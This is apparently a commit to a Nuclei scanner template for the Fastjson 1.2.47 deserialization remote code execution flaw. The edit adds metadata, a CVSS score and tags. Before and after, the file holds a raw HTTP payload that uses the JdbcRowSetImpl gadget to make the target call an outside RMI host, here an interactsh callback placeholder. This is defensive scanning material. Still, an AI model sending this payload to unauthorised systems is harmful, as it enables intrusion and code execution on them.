vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml (before)
id: fastjson-1-2-47-rce

info:
  name: Fastjson 1.2.47 Deserialization RCE
  author: zh
  severity: critical
  reference:
    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
    - https://www.freebuf.com/vuls/208339.html
    - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
    - https://github.com/wyzxxz/fastjson_rce_tool
  tags: fastjson,rce,deserialization,oast

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "a":{
                "@type":"java.lang.Class",
                "val":"com.sun.rowset.JdbcRowSetImpl"
            },
            "b":{
                "@type":"com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
                "autoCommit":true
            }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol   # Confirms DNS Interaction
        words:
          - "dns"

      - type: word
        condition: and
        words:
          - "Bad Request"
          - "400"

vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml (after)
id: fastjson-1-2-47-rce

info:
  name: Fastjson 1.2.47 - Remote Code Execution
  author: zh
  severity: critical
  description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
    - https://www.freebuf.com/vuls/208339.html
    - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
    - https://github.com/wyzxxz/fastjson_rce_tool
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: rce,deserialization,oast,vulhub,fastjson

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "a":{
                "@type":"java.lang.Class",
                "val":"com.sun.rowset.JdbcRowSetImpl"
            },
            "b":{
                "@type":"com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
                "autoCommit":true
            }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol   # Confirms DNS Interaction
        words:
          - "dns"

      - type: word
        condition: and
        words:
          - "Bad Request"
          - "400"

# Enhanced by mp on 2022/05/25

vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml (diff)
@@ -1,15 +1,20 @@
 id: fastjson-1-2-47-rce
 
 info:
-  name: Fastjson 1.2.47 Deserialization RCE
+  name: Fastjson 1.2.47 - Remote Code Execution
   author: zh
   severity: critical
+  description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
     - https://www.freebuf.com/vuls/208339.html
     - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
     - https://github.com/wyzxxz/fastjson_rce_tool
-  tags: fastjson,rce,deserialization,oast
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: rce,deserialization,oast,vulhub,fastjson
 
 requests:
   - raw:
@@ -42,3 +47,5 @@ requests:
         words:
           - "Bad Request"
           - "400"
+
+# Enhanced by mp on 2022/05/25
